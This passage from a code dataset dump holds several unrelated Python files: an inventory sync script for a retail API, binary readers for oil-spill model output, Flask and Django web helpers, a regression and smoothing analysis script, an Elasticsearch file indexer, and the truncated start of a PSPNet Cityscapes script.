brand_no_str + '/m' + model.lower() + '/m' + material.lower() + '/c' + color.lower() + '.jpg'\n return url_str\n\ndef push_all_products_once():\n zouxiu_client = Zouxiu_client()\n stock_doc = minidom.parse(\"/home/yvogue/sync_erp/zouxiu_client/morning.inventory.hk.xml\")\n erp_products = stock_doc.getElementsByTagName(\"product\")\n map(functools.partial(update_one_product, client=zouxiu_client), erp_products)\n print(\"All products are done\")\n\ndef get_item_from_zouxiu(sku):\n return {}\n\ndef update_one_product(item_list, client):\n parent_sku = item_list[0]\n node = item_list[1]\n print(parent_sku)\n print(node)\n model = get_or_empty_str(node, \"model\")\n material = get_or_empty_str(node, \"material\")\n color = get_or_empty_str(node, \"color\")\n pt_sku = get_or_empty_str(node, \"pt_sku\")\n pt_name = get_or_empty_str(node, \"pt_name\")\n price_eu = get_or_empty_str(node, \"price_eu\")\n price = get_or_empty_str(node, \"price\")\n name = get_or_empty_str(node, \"name\")\n size = get_or_empty_str(node, \"size\")\n brand = get_or_empty_str(node, \"brand\")\n cate = get_or_empty_str(node, \"cate\")\n quantity = get_or_empty_str(node, \"quatity\")\n code = 
get_or_empty_str(node, \"code\")\n request_data = [\n {\"productDetailUrl\": \"http://www.yvogue.com\",\n \"xopSupplierItems\": [\n {\"productId\": pt_sku,\n \"productName\": name,\n \"brandNameZhs\": brand,\n \"productDesc\": model+'_'+material+'_'+color,\n \"itemId\": code,\n \"stock\":quantity,\n \"supplyPrice\":price,\n \"catName\": cate}\n ],\n \"brandNameZhs\": brand,\n \"productName\": pt_name,\n \"productId\": pt_sku\n }\n ]\n image_str = get_image_str(brand, model, material, color)\n #print(image_str)\n #print(client.product(data=request_data))\n #time.sleep(1)\n\ndef convert_one_product(node):\n #{'母产品id': [母产品下的所有产品列表], ......}\n pt_sku = get_or_empty_str(node, \"pt_sku\")\n return {pt_sku: [node]}\n\ndef merge_two(node1, node2):\n key_of_node2 = node2.keys()[0]\n if node1.has_key(key_of_node2):\n node1[key_of_node2].append(node2[key_of_node2][0])\n else:\n node1[key_of_node2] = node2[key_of_node2]\n return node1\n\ndef convert_one_product_zouxiu(item_dict):\n #{'母产品id': [母产品下的所有产品列表], ......}\n pt_sku = item_dict['productId']\n return {pt_sku: [item_dict]}\n\ndef update_one_stock(item_dict, erp_products_dict, client):\n print(item_dict)\n print(item_dict['productId'])\n print(\"zouxiu stock:\")\n print(item_dict['stock'])\n print(\"erp stock:\")\n erp_item = None\n global updated_count_total\n for i, erp_nodes in erp_products_dict.items():\n for item in erp_nodes:\n if get_or_empty_str(item, \"code\") == item_dict['itemId']:\n erp_item = item\n print(get_or_empty_str(item, \"quatity\"))\n if get_or_empty_str(item, \"quatity\") == None and item_dict['stock'] == None:\n print(\"zouxiu stock == erp_stock, not updating stock...\")\n elif item_dict['stock']!= None and (int(get_or_empty_str(item, \"quatity\")) == int(item_dict['stock'])):\n print(\"zouxiu stock == erp_stock, not updating stock...\")\n else:\n #if get_or_empty_str(item, \"code\")==\"9600000818912\":\n print(\"<-zouxiu stock != erp_stock, need updating stock...\")\n response = client.update_item_stock(data=[{\"itemId\":item_dict['itemId'], \"stock\":get_or_empty_str(item, \"quatity\")}])\n print(response)\n updated_count_total += 1\n print(\"update complete!->\")\n #time.sleep(100)\n erp_products_dict[i].remove(item)\n if erp_products_dict[i] == []:\n erp_products_dict.pop(i, None)\n if erp_item == None:\n print(\"<-zouxiu item not in erp_stock, set stock 0 in zouxiu...\")\n if item_dict['stock'] == None or int(item_dict['stock']) == 0:\n print(\"zouxiu stock already 0, update complete!->\")\n else:\n response = client.update_item_stock(data=[{\"itemId\":item_dict['itemId'], \"stock\":0}])\n updated_count_total += 1\n print(\"zouxiu stock already 0, set 0, update complete!->\")\n\ndef upload_one_erp_product(item_list, zouxiu_items_dict, client):\n parent_sku = item_list[0]\n for node in item_list[1]:\n model = get_or_empty_str(node, \"model\")\n material = get_or_empty_str(node, \"material\")\n color = get_or_empty_str(node, \"color\")\n pt_sku = get_or_empty_str(node, \"pt_sku\")\n pt_name = get_or_empty_str(node, \"pt_name\")\n price_eu = get_or_empty_str(node, \"price_eu\")\n price = get_or_empty_str(node, \"price\")\n name = get_or_empty_str(node, \"name\")\n size = get_or_empty_str(node, \"size\")\n brand = get_or_empty_str(node, \"brand\")\n cate = get_or_empty_str(node, \"cate\")\n quantity = get_or_empty_str(node, \"quatity\")\n code = get_or_empty_str(node, \"code\")\n image_str = get_image_str(brand, model, material, color)\n if zouxiu_items_dict.has_key(parent_sku):\n print(\"<-Parent exist, we create 
item\")\n request_data = [\n {\"itemId\": code,\n \"itemColor\": color,\n \"productId\": pt_sku,\n \"itemSize\":size,\n \"supplyPrice\":int(float(price)*0.72129),\n \"marketPrice\":int(float(price)*0.72129),\n \"sellPrice\":int(float(price)*0.72129),\n \"mainPicture\":image_str,\n \"catName\": cate,\n \"stock\": quantity}\n ]\n print(client.item(data=request_data))\n print(\"Creating item complete->\")\n time.sleep(1)\n else:\n print(\"<-Parent not exist, we create product\")\n request_data = [\n {\"productDetailUrl\": \"http://www.yvogue.com\",\n \"xopSupplierItems\": [\n {\"productId\": pt_sku,\n \"productName\": name,\n \"brandNameZhs\": brand,\n \"productDesc\": model+'_'+material+'_'+color,\n \"itemId\": code,\n \"stock\":quantity,\n \"supplyPrice\":int(float(price)*0.72129),\n \"marketPrice\":int(float(price)*0.72129),\n \"sellPrice\":int(float(price)*0.72129),\n \"mainPicture\":image_str,\n \"catName\": cate}\n ],\n \"brandNameZhs\": brand,\n \"productName\": pt_name,\n \"productId\": pt_sku\n }\n ]\n print(client.product(data=request_data))\n print(\"Creating product complete->\")\n zouxiu_items_dict[parent_sku] = {}\n time.sleep(1)\n\ndef update_all_products():\n stock_doc = minidom.parse(\"/home/yvogue/sync_erp/zouxiu_client/morning.inventory.hk.xml\")\n zouxiu_client = Zouxiu_client()\n\n erp_products = stock_doc.getElementsByTagName(\"product\")\n erp_products_dict = reduce(merge_two, map(convert_one_product, erp_products))\n all_zouxiu_items = get_all_products(zouxiu_client=zouxiu_client)\n all_zouxiu_items_dict = reduce(merge_two, map(convert_one_product_zouxiu, all_zouxiu_items))\n\n #map(functools.partial(update_one_product, client={}), erp_products_dict.iteritems())\n print(\"--------------------------------------------------------------------------------------------------\")\n print(\"Firstly, we update stocks!\")\n print(\"--------------------------------------------------------------------------------------------------\")\n time.sleep(3)\n map(functools.partial(update_one_stock, erp_products_dict = erp_products_dict, client=zouxiu_client), all_zouxiu_items)\n print(\"First step finished!\")\n print(\"updated:\")\n print(updated_count_total)\n time.sleep(5)\n\n #print(\"NEW PRODUCTS:\")\n #print(erp_products_dict)\n print(\"--------------------------------------------------------------------------------------------------\")\n print(\"Secondly, we create new products!\")\n print(\"--------------------------------------------------------------------------------------------------\")\n time.sleep(3)\n #print(erp_products_dict)\n map(functools.partial(upload_one_erp_product, zouxiu_items_dict=all_zouxiu_items_dict, client=zouxiu_client), erp_products_dict.iteritems())\n\n print(\"--------------------------------------------------------------------------------------------------\")\n print(\"All products are updated!\")\n print(\"--------------------------------------------------------------------------------------------------\")\n print(erp_products_dict)\n return True\n\nwhile True:\n while True:\n try:\n updated_count_total = 0\n update_all_products()\n break\n except:\n traceback.print_exc()\n print(\"Network failure, retry in 60secs...\")\n time.sleep(60)\n import gc\n gc.collect()\n print(\"sleep 5*60 sec...\")\n time.sleep(5*60)\n\n","sub_path":"update_all_products.py","file_name":"update_all_products.py","file_ext":"py","file_size_in_byte":10946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} 
+{"seq_id":"570994424","text":"import os\nimport struct\nfrom collections import OrderedDict\n\ndef read_lu3(data):\n \"\"\"Return a dictionary of arrays with data from the LU3 file\n :param bytes data: LU3 file in binary form\"\"\"\n\n rec = OrderedDict([\n (\"Version\", []), (\"Simtime\",[]), (\"Time\", []), (\"rec1st\",[]), (\"rec2st\",[]), (\"rec2end\",[]),\n (\"rec3st\",[]), (\"rec3end\",[]), (\"rec5st\",[]), (\"rec5end\",[]), (\"sed2st\",[]), (\"sed2end\",[]),\n (\"rar1st\",[]), (\"rar1end\",[]), (\"rth1st\",[]), (\"rth1end\",[]), (\"rsf1st\",[]), (\"rsf1end\",[]),\n (\"rsp1st\",[]), (\"rsp1end\",[]), (\"rss1st\",[]), (\"rss1end\",[]), (\"rat1st\",[]), (\"rat1end\",[]),\n ])\n\n i = True\n while(i):\n try:\n for k in rec.keys():\n rec[k].append(struct.unpack('i' if k!=\"Time\" else 'f', data.read(4))[0]) # one float value\n except struct.error:\n i = False\n return rec\n\n\ndef read_slk(lu3rec, data):\n \"\"\"Read SLK data from binary form by using a struct to unpack the bytes. Creates an array:\n [\n (time0, [ [ihab_rec0, dx_rec0, dy_rec0, LON_rec0, LAT_rec0, v1_rec0, v2_rec0, v3_rec0, v4_rec0], [...] ]),\n (time1, [...]),\n ...\n (timeN, ...)\n ]\n All SLK variables are floats.\n :param dict lu3rec: record of byte offsets from LU3 file, corresponding to each time step record\n :param bytes data: SLK file read in binary form\"\"\"\n\n fields = [\"ihab\", \"dx\", \"dy\", \"LON\", \"LAT\", \"v1\", \"v2\", \"v3\", \"v4\"]\n fstart = lu3rec['rss1st'][0] * 36 # number of records * record size = byte offset to start at\n data.seek(fstart)\n\n slk_out = []\n recs = zip(lu3rec['rss1st'], lu3rec['rss1end'], lu3rec['Time'])\n for (start, end, time) in recs:\n try:\n tstep_out = []\n for _rec in range(end-start+1):\n _rec_out = []\n for k in fields:\n _rec_out.append(struct.unpack('f', data.read(4))[0]) # all floats\n tstep_out.append(_rec_out)\n if tstep_out: # where the range is 0 (start==end), we don't need to append any records\n slk_out.append((time, tstep_out))\n except struct.error:\n break\n\n return slk_out\n\n\ndef read_tr3(lu3rec, data):\n \"\"\"Read TR3 data from binary form by using a struct to unpack the bytes. Creates two arrays:\n [ # spillets\n (time0, [ [xspil, yspil, ... spilletNumber], [...] ]),\n (time1, [...]),\n ...\n (timeN, ...)\n ]\n [ # shoreline\n (time0, [ [ICellIndex, JCellIndex, ...], [...] ]),\n (time1, [...]),\n ...\n (timeN, ...)\n ]\n Spillets have only two integer variables: ptype and spilletNumber; the rest are floats.\n Shoreline data has 3 integer variables: ICellIndex, JCellIndex, and shoretype. 
The rest are floats.\n    :param dict lu3rec: record of byte offsets from LU3 file, corresponding to each time step record\n    :param data: TR3 file opened in binary mode (file-like object)\"\"\"\n\n    fields_spl = [\"xspil\", \"yspil\", \"rspil\", \"xspilold\", \"yspilold\", \"ptype\", \"surf\", \"dspilm\", \"viscm\", \"fwc\", \"age\", \"spilletNumber\"]\n    fields_shr = [\"ICellIndex\", \"JCellIndex\", \"shoretype\", \"ShoreArea\", \"ShoreLength\", \"ShoreViscosity\", \"SegmentLon1\",\n                  \"SegmentLat1\", \"SegmentLon2\", \"SegmentLat2\", \"ShoreMass\", \"ex2\"]\n\n    fstart = lu3rec['rec2st'][0] * 48 # number of records * bytes per record = byte offset\n    data.seek(fstart) # seek to the beginning of records\n\n    recs_out_spl = [] # array [(time, record_array), ...]\n    recs_out_shr = []\n\n    # loop through timestep, index position groups\n    for (rec2st, rec2end, rec3st, rec3end, time) in zip(lu3rec['rec2st'], lu3rec['rec2end'], lu3rec['rec3st'], lu3rec['rec3end'], lu3rec['Time']):\n        try:\n            # spillets---\n            tstep_records_spl = [] # hold all spillet records for *this* timestamp\n            for _rec in range(rec2end-rec2st): # obtain this many records for this timestep\n                _rec_out = []\n                for k in fields_spl:\n                    _rec_out.append(struct.unpack('f' if k not in [\"ptype\", \"spilletNumber\"] else 'i', data.read(4))[0])\n                tstep_records_spl.append(_rec_out) # append the newly created record\n            recs_out_spl.append((time, tstep_records_spl)) # append all records for this timestep\n\n            # seek to the starting index of rec3st for *this* timestamp\n            data.seek(rec3st * 48)\n\n            # shoreline--- same steps as spillets\n            tstep_records_shr = []\n            for _rec in range(rec3end-rec3st):\n                _rec_out = []\n                for k in fields_shr:\n                    _rec_out.append(struct.unpack('f' if k not in [\"ICellIndex\", \"JCellIndex\", \"shoretype\"] else 'i', data.read(4))[0])\n                tstep_records_shr.append(_rec_out)\n            recs_out_shr.append((time, tstep_records_shr))\n\n            data.read(48*7) # skip the blank group of 7 records (48 bytes each) between timestep groups\n\n        except struct.error:\n            break\n    return (recs_out_spl, recs_out_shr)\n","sub_path":"outdata/asa_model_esri/ARAMCO_OILMAP_Postgres_Py/read_fmt.py","file_name":"read_fmt.py","file_ext":"py","file_size_in_byte":5162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"264649836","text":"from flask import g, jsonify, current_app, request\n\n\n# from glycresoft_app.utils import json_serializer\nfrom glycan_profiling.serialize import IdentifiedGlycopeptide\nfrom glycan_profiling.plotting import colors\nfrom glycan_profiling.chromatogram_tree import mass_shift\nfrom glypy.composition import formula\nfrom glypy.composition.glycan_composition import from_iupac_lite, IUPACError\nfrom glycopeptidepy.structure.modification import ModificationTable, ModificationCategory\n\nfrom .service_module import register_service\nfrom .view_hypothesis import _locate_hypothesis\n\n\napi = register_service(\"api\", __name__)\n\n\n@api.route(\"/api/identified_glycopeptide/<int:id>\")\ndef get_glycopeptide_match_api(id):\n    gpm = g.db.query(IdentifiedGlycopeptide).get(id)\n    if gpm is None: # .get() returns None for an unknown id\n        return jsonify()\n    return jsonify(**{\n        \"id\": gpm.id, \"glycopeptide\": str(gpm.structure.glycopeptide_sequence), \"ms2_score\": gpm.ms2_score,\n        \"ms1_score\": gpm.ms1_score\n    })\n\n\n@api.route(\"/api/tasks\")\ndef api_tasks():\n    return jsonify(**{t.id: t.to_json() for t in g.manager.tasks().values()})\n\n\n@api.route(\"/api/colors\")\ndef api_colors():\n    return 
jsonify(**colors.color_dict())\n\n\n@api.route(\"/api/samples\")\ndef api_samples():\n    samples = g.manager.samples(g.user)\n    d = {}\n    for h in samples:\n        try:\n            d[str(h.name)] = h.to_json()\n        except Exception:\n            current_app.logger.exception(\"Error occurred in api_samples\", exc_info=True)\n    return jsonify(**d)\n\n\n@api.route(\"/api/hypotheses\")\ndef api_hypotheses():\n    d = {}\n    for hypothesis in g.manager.glycan_hypotheses(g.user):\n        try:\n            dump = hypothesis.to_json()\n            d[hypothesis.uuid] = dump\n        except Exception:\n            current_app.logger.exception(\"Error occurred in api_hypotheses\", exc_info=True)\n    for hypothesis in g.manager.glycopeptide_hypotheses(g.user):\n        try:\n            dump = hypothesis.to_json()\n            d[hypothesis.uuid] = dump\n        except Exception:\n            current_app.logger.exception(\"Error occurred in api_hypotheses\", exc_info=True)\n    return jsonify(**d)\n\n\n@api.route(\"/api/hypotheses/<uuid>\")\ndef get_hypothesis(uuid):\n    hypothesis = _locate_hypothesis(uuid)\n    return jsonify(hypothesis=hypothesis.to_json())\n\n\n@api.route(\"/api/analyses\")\ndef api_analyses():\n    d = {}\n    for analysis in g.manager.analyses(g.user):\n        try:\n            dump = analysis.to_json()\n            d[analysis.uuid] = dump\n        except Exception:\n            current_app.logger.exception(\"Error occurred in api_analyses for %r\", analysis, exc_info=True)\n    return jsonify(**d)\n\n\n@api.route(\"/api/modifications\")\ndef modifications():\n    d = {}\n    mt = ModificationTable()\n    d['definitions'] = [\n        (rule.title, formula(rule.composition), rule.mass) for rule in mt.rules()\n    ]\n    d['specificities'] = set()\n    for rule in mt.rules():\n        if (ModificationCategory.substitution in rule.categories or\n                ModificationCategory.glycosylation in rule.categories or\n                ModificationCategory.other_glycosylation in rule.categories):\n            continue\n        d['specificities'].update(rule.as_spec_strings())\n    d['specificities'] = tuple(d['specificities'])\n    return jsonify(**d)\n\n\n@api.route(\"/api/validate-iupac\", methods=[\"POST\"])\ndef api_validate_iupac():\n    payload = str(request.values.get(\"target_string\")).strip()\n    if payload == \"\":\n        return jsonify(valid=False, message=\"empty name\", query=payload)\n    try:\n        residue = from_iupac_lite(payload)\n        return jsonify(valid=True, message=str(residue), query=payload)\n    except IUPACError as e:\n        return jsonify(valid=False, message=str(e), query=payload)\n\n\n@api.route(\"/api/mass-shift\")\ndef mass_shifts():\n    d = {}\n    d.update(mass_shift.mass_shift_index)\n    return jsonify(**d)\n","sub_path":"glycresoft_app/services/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":3845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"123703171","text":"from django.conf import settings\n\nfrom timepiece import models as timepiece\nfrom timepiece.forms import QuickSearchForm\n\n\ndef timepiece_settings(request):\n    default_famfamfam_url = settings.STATIC_URL + 'images/icons/'\n    famfamfam_url = getattr(settings, 'FAMFAMFAM_URL', default_famfamfam_url)\n    context = {\n        'FAMFAMFAM_URL': famfamfam_url,\n    }\n    return context\n\n\ndef quick_search(request):\n    return {\n        'quick_search_form': QuickSearchForm(),\n    }\n\n\ndef active_entries(request):\n    active_entries = None\n\n    if request.user.is_authenticated():\n        active_entries = timepiece.Entry.objects.filter(\n            end_time__isnull=True,\n        ).exclude(\n            user=request.user,\n        ).select_related('user', 'project', 'activity')\n\n    return {\n        'active_entries': active_entries,\n    }\n\n\ndef extra_nav(request):\n    context = {\n        'extra_nav': getattr(settings, 
'EXTRA_NAV', {})\n }\n return context\n","sub_path":"timepiece/context_processors.py","file_name":"context_processors.py","file_ext":"py","file_size_in_byte":957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"266751017","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Nov 29 18:22:58 2019\n\n@author: andyb\n\"\"\"\n\n# %%\nimport pandas as pd\nimport argparse\nfrom sklearn.linear_model import LinearRegression\n# import seaborn as sns\n# import pyBigWig\nimport numpy as np\nfrom scipy import stats\nimport time\nimport statsmodels.api as sm\n# import matplotlib.pyplot as plt\nfrom scipy.stats import zscore\n\n# %%\nparser = argparse.ArgumentParser(description='build linear model a smooth')\nparser.add_argument('--datafile', required=True)\nparser.add_argument('--rep_timing', required=True)\nparser.add_argument('--signal', required=True)\n\nargs = parser.parse_args()\n\n# %%\n# args = argparse.Namespace()\n# args.datafile = '/faststorage/project/reprator/Andrej/reprator2/data/signal/LUAD/603e16bf-9b05-49c9-a925-f409626c969a.signal.feather'\n# args.rep_timing = '/faststorage/project/reprator/Andrej/reprator2/data/bigwigs/rep_timing.feather'\n# args.signal = \"/faststorage/project/reprator/Andrej/reprator2/data/residuals/LUAD/603e16bf-9b05-49c9-a925-f409626c969a/smoothing_1400/extreme_2/signal.feather\"\n\n# %%\nsplit = args.signal.split('/')\npath = '/'.join(split[0: -3])\nsmoothing = split[-3].split('_')[-1]\nextreme = split[-2].split('_')[-1]\n\n# %%\n# args.lm_stats = '/faststorage/project/reprator/Andrej/reprator2/data/results/LUAD/603e16bf-9b05-49c9-a925-f409626c969a.lm_stats.tsv'\nargs.lm_stats = f'{path}/smoothing_{smoothing}/extreme_{extreme}/lm_stats.tsv'\n# args.final_df = '/faststorage/project/reprator/Andrej/reprator2/data/results/LUAD/603e16bf-9b05-49c9-a925-f409626c969a.feather'\n# args.final_df = f'{path}/{smoothing}/final_df.feather'\n# args.plot_dir = '/faststorage/project/reprator/Andrej/reprator2/data/results/LUAD/603e16bf-9b05-49c9-a925-f409626c969a_plots'\nargs.plot_dir = f'{path}/smoothing_{smoothing}/extreme_{extreme}/plots'\n# plot for each chromosome\n\n# %%\ndata = pd.read_feather(args.datafile)\ndata['rep_timing'] = pd.read_feather(args.rep_timing)['rep_timing']\ndata_pure = data.query('ideal').dropna()\n\n# %%\n# sns.jointplot('segment', 'copy', data_pure, kind=\"hex\")\n# data_pure.loc[:, ['copy', 'segment']].describe()\n\n# %% build linear model\nlm = LinearRegression()\nlm.fit(data_pure.loc[:, ['segment']], data_pure['copy'])\nr2 = lm.score(data_pure.loc[:, [\"segment\"]], data_pure[\"copy\"])\n\n# %%\ndata_pure['predicted'] = lm.predict(data_pure.loc[:, [\"segment\"]])\ndata_pure['residuals'] = data_pure[\"copy\"] - data_pure['predicted']\n\n# %%\n# data_pure.loc[:, ['residuals', 'rep_timing']].corr()\n\n# %%\n\n# tmp = data_pure\n\n# %%\n# sns.lineplot(tmp['start'], stats.zscore(tmp['residuals']))\n# sns.lineplot(tmp['start'], stats.zscore(tmp['rep_timing']))\n# sns.lineplot(tmp['start'], stats.zscore(tmp['loess']))\n\n# %% filter based on z score\ndata_pure['residuals_Z_score'] = zscore(data_pure['residuals'])\ndata_pure = data_pure[data_pure['residuals_Z_score'] < float(extreme)]\ndata_pure = data_pure[data_pure['residuals_Z_score'] > -float(extreme)]\n# tmp.shape[0] - data_pure.shape[0]\n\n\n# %%\ndata_pure['loess'] = np.nan\ndata_pure.reset_index(drop=True, inplace=True)\n\n# %%\nfor i in range(22, 0, -1):\n tmp = data_pure.query(f\"chr == 'chr{i}'\")\n size = 
tmp.shape[0]\n\n start = time.time()\n loess = sm.nonparametric.lowess(stats.zscore(tmp['residuals']), range(size),\n frac=float(smoothing) / size)\n print(size, time.time() - start)\n\n data_pure.iloc[tmp.index, -1] = loess[:, 1]\n\n# %%\ndata_pure.to_feather(args.signal)\n\n# %%\n# plt.ioff()\n# for i in range(22, 0, -1):\n# fig, ax = plt.subplots()\n# tmp = data_pure.query(f\"chr == 'chr{i}'\")\n# \n# sns.lineplot(tmp['start'], stats.zscore(tmp['rep_timing']), ax=ax)\n# sns.lineplot(tmp['start'], stats.zscore(tmp['loess']), ax=ax)\n# ax.legend(('rep_time', 'loess'))\n# \n# outplot = args.plot_dir + f'/chr{i}.png'\n# fig.savefig(outplot, dpi=300)\n# print(outplot)\n# \n# %%\ncorrelation = data_pure.loc[:, ['rep_timing', 'loess']].corr().iloc[0, 1]\n\n# %%\nwith open(args.lm_stats, 'w') as f:\n lines = ['intercept\\tslope\\tr_squared\\tcorr\\n',\n f'{lm.intercept_}\\t{lm.coef_[0]}\\t{r2}\\t{correlation}\\n']\n f.writelines(lines)\n","sub_path":"pipeline/scripts/build_linear_model_with_extremes.py","file_name":"build_linear_model_with_extremes.py","file_ext":"py","file_size_in_byte":4150,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"127668031","text":"import logging\n# import datetime\nimport os\n# import urllib2\n# import json\nfrom elasticsearch_dsl.query import Q\nfrom designsafe.apps.data.models.elasticsearch import IndexedFile\nfrom designsafe.apps.api.agave import get_service_account_client\nfrom django.conf import settings\nimport magic\nimport re\n\n# pylint: disable=invalid-name\nlogger = logging.getLogger(__name__)\n# pylint: enable=invalid-name\n\n\nclass FileManager(object):\n \"\"\"Elasticsearch File Manager Class\"\"\"\n def __init__(self, username):\n self.username = username\n\n def _pems_filter(self):\n term_username_query = Q(\n 'term',\n **{'permissions.username': self.username}\n )\n term_world_query = Q(\n 'term',\n **{'permissions.username': 'WORLD'}\n )\n bool_query = Q('bool')\n bool_query.should = [term_username_query, term_world_query]\n nested_query = Q('nested')\n nested_query.path = 'permissions'\n nested_query.query = bool_query\n return nested_query\n\n def listing(self, system='designsafe.storage.default', path='/'):\n \"\"\"Lists a file\n\n :param str system: System Id. 
Default: designsafe.storage.default\n        :param str path: Path\n        \"\"\"\n        logger.debug('listing %s', os.path.join(system, path))\n        search = IndexedFile.search()\n        term_system_query = Q(\n            'term',\n            **{'system._exact': system}\n        )\n        term_path_query = Q('term', **{'path._exact': path})\n        bool_query = Q('bool')\n        bool_query.must = [term_system_query, term_path_query]\n        bool_query.filter = self._pems_filter()\n        search = search.query(bool_query)\n        search = search.sort({'name._exact': 'asc'})\n        res = search.execute()\n        logger.debug('res %s', str(res.hits.total))\n        return res, search\n\n    def listing_recursive(\n            self,\n            system='designsafe.storage.default',\n            path='/'):\n        \"\"\"Lists every folder's children\"\"\"\n        search = IndexedFile.search()\n        term_system_query = Q(\n            'term',\n            **{'system._exact': system}\n        )\n        term_path_query = Q('term', **{'path._path': path})\n        bool_query = Q('bool')\n        bool_query.must = [term_system_query, term_path_query]\n        bool_query.filter = self._pems_filter()\n        search = search.query(bool_query)\n        search = search.sort({'name._exact': 'asc'})\n        res = search.execute()\n        return res, search\n\n    def get(self, system='designsafe.storage.default', path='/', name=''):\n        \"\"\"Gets a file\"\"\"\n        search = IndexedFile.search()\n        term_system_query = Q(\n            'term',\n            **{'system._exact': system}\n        )\n        term_path_query = Q('term', **{'path._exact': path})\n        term_name_query = Q('term', **{'name._exact': name})\n        bool_query = Q('bool')\n        bool_query.must = [\n            term_system_query,\n            term_path_query,\n            term_name_query\n        ]\n        bool_query.filter = self._pems_filter()\n        search = search.query(bool_query)\n        search = search.sort({'name._exact': 'asc'})\n        res = search.execute()\n        # logger.debug('search :%s', json.dumps(search.to_dict(), indent=2))\n        return res, search\n\n    @staticmethod\n    def mimetype_lookup(file_object, debug_mode=True):\n        \"\"\"\n        Obtain a file's mimetype given an Agave response file object.\n\n        When developing locally (DEBUG==True) we can't assume that Corral is\n        mounted, so we simply trust the mimetype that Agave already reports. 
In staging/prod where Corral is mounted, we\n        build up the absolute path of the file and pass that to python-magic to\n        get the mimetype.\n\n        :param agavepy.agave.AttrDict file_object: Agave file object to look up.\n        :param bool debug_mode: True if Debug mode is active; False otherwise.\n\n        :return string mimeType: The mimetype to index with Elasticsearch.\n\n        \"\"\"\n        if debug_mode:\n            # In local dev, Corral isn't mounted, so trust the mimetype Agave already reports.\n            return file_object.mimeType\n        else:\n            # In staging/prod, Corral is mounted and we can use the absolute path to get the mimetype.\n            SYSTEM_ID_PATHS = [\n                {'regex': r'^designsafe.storage.default$',\n                 'path': '/corral-repl/tacc/NHERI/shared'},\n                {'regex': r'^designsafe.storage.community$',\n                 'path': '/corral-repl/tacc/NHERI/community'},\n                {'regex': r'^designsafe.storage.published$',\n                 'path': '/corral-repl/tacc/NHERI/published'},\n                {'regex': r'^project\\-',\n                 'path': '/corral-repl/tacc/NHERI/projects'}\n            ]\n            for mapping in SYSTEM_ID_PATHS:\n                if re.search(mapping['regex'], file_object['system']):\n                    base_path = mapping['path']\n                    if mapping['regex'] == r'^project\\-':\n                        base_path += '/' + file_object['system'][8:]\n                    break\n\n            filePath = base_path + file_object['path']\n            if os.path.isdir(filePath):\n                mimeType = 'text/directory'\n            else:\n                mimeType = magic.from_file(filePath, mime=True)\n\n            return mimeType\n\n    def index(self, file_object, pems):\n        \"\"\"Indexes an Agave response file object (json) to an IndexedFile\"\"\"\n        res, search = self.get(file_object.system,\n                               os.path.dirname(file_object.path.strip('/')),\n                               os.path.basename(file_object.path.strip('/')))\n        if res.hits.total > 1:\n            for doc in res[1:]:\n                doc.delete(ignore=404)\n        if res.hits.total >= 1:\n            document = res[0]\n            file_object.pop('_links')\n            file_object.pop('permissions')\n            document.update(**file_object)\n        else:\n            document = IndexedFile(\n                name=os.path.basename(file_object.path.strip('/')),\n                path=os.path.dirname(file_object.path.strip('/')) or '/',\n                lastModified=file_object.lastModified.isoformat(),\n                length=file_object.length,\n                format=file_object.format,\n                mimeType=FileManager.mimetype_lookup(file_object, settings.DEBUG),\n                type=file_object.type,\n                system=file_object.system,\n            )\n            if not pems: # covers both None and an empty list\n                document.permissions = [{\n                    'username': self.username,\n                    'permission': {\n                        'read': True,\n                        'write': True,\n                        'execute': True\n                    }\n                }]\n            document.save()\n\n        if pems:\n            for pem in pems:\n                pem.pop('_links', None)\n                pem.pop('internalUsername', None)\n            document.update(permissions=pems)\n        return document\n","sub_path":"designsafe/apps/data/managers/elasticsearch.py","file_name":"elasticsearch.py","file_ext":"py","file_size_in_byte":7131,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"242434867","text":"import numpy as np\nimport argparse\nimport skimage.transform\nfrom nn import pspnet, nn_utils, nn_processor\nfrom reader import dataReaderSegmentation\nimport cityscapes_reader, cityscapes_labels\n\n\n# define parameters\nBATCH_SIZE = 1\nDS_NAME = 'cityscapes'\nTILE_SIZE = (713, 713)\nNUM_CLASS = 19\nPAR_DIR = DS_NAME+'/res101'\nGPU = 0\nDATA_DIR = r'/hdd/cityscapes'\nRGB_TYPE = 'leftImg8bit'\nGT_TYPE = 'gtFine'\nRGB_EXT = RGB_TYPE\nGT_EXT = 'labelTrainIds'\nFORCE_RUN = True\nRES_DIR = r'/hdd6/Models/cityscapes/psp_github'\n\n\ndef read_flag():\n    parser = argparse.ArgumentParser()\n    parser.add_argument('--batch-size', default=BATCH_SIZE, type=int, help='batch size')\n    
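# each flag below defaults to the matching module-level constant defined above\n    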
parser.add_argument('--ds-name', default=DS_NAME, type=str, help='dataset name')\n    parser.add_argument('--tile-size', default=TILE_SIZE, type=tuple, help='tile size')\n    parser.add_argument('--num-classes', type=int, default=NUM_CLASS, help='# classes (including background)')\n    parser.add_argument('--model-par-dir', type=str, default=PAR_DIR, help='parent directory name to save the model')\n    parser.add_argument('--GPU', type=str, default=GPU, help=\"GPU used for computation.\")\n    parser.add_argument('--data-dir', type=str, default=DATA_DIR, help='root directory of cityscapes')\n    parser.add_argument('--rgb-type', type=str, default=RGB_TYPE, help='rgb type in cityscapes')\n    parser.add_argument('--gt-type', type=str, default=GT_TYPE, help='gt type in cityscapes')\n    parser.add_argument('--rgb-ext', type=str, default=RGB_EXT, help='rgb extension in their file names')\n    parser.add_argument('--gt-ext', type=str, default=GT_EXT, help='gt extensions in their file names')\n    parser.add_argument('--force-run', type=bool, default=FORCE_RUN, help='force run collection maker or not') # note: argparse's type=bool treats any non-empty string as True\n    parser.add_argument('--res-dir', type=str, default=RES_DIR, help='path to ckpt of Res101 model')\n\n    flags = parser.parse_args()\n    return flags\n\n\ndef make_general_id_map(pred):\n    label_dict = {}\n    for l in cityscapes_labels.labels:\n        if l.trainId 